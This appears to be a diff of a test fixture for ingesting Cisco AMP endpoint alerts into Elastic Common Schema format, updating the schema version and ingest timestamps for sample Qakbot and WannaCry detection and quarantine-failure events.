"version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -5269,7 +5269,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843688761Z", + "ingested": "2021-09-13T18:07:04.510448315Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "kind": "alert", "action": "Retrospective Quarantine", @@ -5322,7 +5322,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -5346,7 +5346,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843690628Z", + "ingested": "2021-09-13T18:07:04.510450164Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"igvj$vN.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\igvj$vN.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -5401,7 +5401,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -5425,7 +5425,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843705689Z", + "ingested": "2021-09-13T18:07:04.510452021Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"6951045.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\6951045.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -5482,7 +5482,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -5508,7 +5508,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843709643Z", + "ingested": "2021-09-13T18:07:04.510453895Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"99fffe78e0cbd7b508eed13a8633903dd89ed5f1\",\"md5\":\"dc41e47ebba549ec5e616ed9e88a0376\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -5561,7 +5561,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -5581,7 +5581,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843711565Z", + "ingested": "2021-09-13T18:07:04.510455739Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -5636,7 +5636,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -5656,7 +5656,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843713424Z", + "ingested": "2021-09-13T18:07:04.510457608Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -5711,7 +5711,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -5731,7 +5731,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843715300Z", + "ingested": "2021-09-13T18:07:04.510459484Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -5786,7 +5786,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -5806,7 +5806,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843717182Z", + "ingested": "2021-09-13T18:07:04.510461339Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -5861,7 +5861,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -5881,7 +5881,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843719050Z", + "ingested": "2021-09-13T18:07:04.510463204Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -5936,7 +5936,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -5956,7 +5956,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843721187Z", + "ingested": "2021-09-13T18:07:04.510465143Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6011,7 +6011,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -6031,7 +6031,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843723102Z", + "ingested": "2021-09-13T18:07:04.510467022Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6086,7 +6086,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -6106,7 +6106,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843725006Z", + "ingested": "2021-09-13T18:07:04.510468869Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6161,7 +6161,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -6181,7 +6181,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843726903Z", + "ingested": "2021-09-13T18:07:04.510470729Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6236,7 +6236,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -6256,7 +6256,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843728796Z", + "ingested": "2021-09-13T18:07:04.510472598Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6311,7 +6311,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -6331,7 +6331,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843730684Z", + "ingested": "2021-09-13T18:07:04.510474450Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6386,7 +6386,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -6406,7 +6406,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843732572Z", + "ingested": "2021-09-13T18:07:04.510476347Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -6472,7 +6472,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -6502,7 +6502,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843734515Z", + "ingested": "2021-09-13T18:07:04.510478192Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat 